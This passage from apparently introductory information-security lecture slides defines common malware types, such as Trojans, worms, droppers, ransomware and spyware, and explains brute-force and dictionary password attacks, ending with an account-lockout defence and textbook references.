themselves. They do this by compromising malware detection software so that
the software will report an infected area as being uninfected. These viruses
conceal any increase in the size of an infected file or changes to the file’s date and
time of last modification.

70
Malware attack….
• Trojans — A Trojan or a Trojan horse is a program that hides in a useful program and
usually has a malicious function. A major difference between viruses and Trojans is that
Trojans do not self-replicate. In addition to launching attacks on a system, a Trojan can
establish a back door that can be exploited by attackers. For example, a Trojan can be
programmed to open a high-numbered port so the hacker can use it to listen and then
perform an attack.
• Logic bombs — A logic bomb is a type of malicious software that is appended to an
application and is triggered by a specific occurrence, such as a logical condition or a
specific date and time.
• Worms — Worms differ from viruses in that they do not attach to a host file, but are self-
contained programs that propagate across networks and computers. Worms are
commonly spread through email attachments; opening the attachment activates the
worm program. A typical worm exploit involves the worm sending a copy of itself to
every contact in an infected computer’s email address In addition to conducting
malicious activities, a worm spreading across the internet and overloading email servers
can result in denial-of-service attacks against nodes on the network.

71
Malware attack…
• Droppers — A dropper is a program used to install viruses on computers. In
many instances, the dropper is not infected with malicious code and,
therefore might not be detected by virus-scanning software. A dropper can
also connect to the internet and download updates to virus software that is
resident on a compromised system.
• Ransomware — Ransomware is a type of malware that blocks access to
the victim’s data and threatens to publish or delete it unless a ransom is
paid. While some simple computer ransomware can lock the system in a
way that is not difficult for a knowledgeable person to reverse, more
advanced malware uses a technique called cryptoviral extortion, which
encrypts the victim’s files in a way that makes them nearly impossible to
recover without the decryption key.

72
Malware attack…
• Adware — Adware is a software application used by companies for
marketing purposes; advertising banners are displayed while any program
is running. Adware can be automatically downloaded to your system while
browsing any website and can be viewed through pop-up windows or
through a bar that appears on the computer screen automatically.
• Spyware — Spyware is a type of program that is installed to collect
information about users, their computers or their browsing habits. It tracks
everything you do without your knowledge and sends the data to a remote
user. It also can download and install other malicious programs from the
internet. Spyware works like adware but is usually a separate program that
is installed unknowingly when you install another freeware application.
•

73
Password attack
• Because passwords are the most commonly used mechanism to
authenticate users to an information system, obtaining passwords is a
common and effective attack approach.
• Access to a person’s password can be obtained by looking around the
person’s desk, ‘‘sniffing’’ the connection to the network to acquire
unencrypted passwords, using social engineering, gaining access to a
password database or outright guessing.
• The last approach can be done in either a random or systematic manner:
• Brute-force password guessing means using a random approach by trying different
passwords and hoping that one work Some logic can be applied by trying passwords
related to the person’s name, job title, hobbies or similar items.
• In a dictionary attack, a dictionary of common passwords is used to attempt to gain
access to a user’s computer and network. One approach is to copy an encrypted file
that contains the passwords, apply the same encryption to a dictionary of commonly
used passwords, and compare the results.
In order to protect yourself from dictionary or brute-force attacks, you need to
implement an account lockout policy that will lock the account after a few invalid
password attempts.

74
References
• Whitman, M. E. & Mattord, H. J. (2017) Principles of Information
Security. 6th edition. Cengage Learning.
• https://blog.netwrix.com/2018/05/15/top-10-most-common-types-
of-cyber-attacks/

75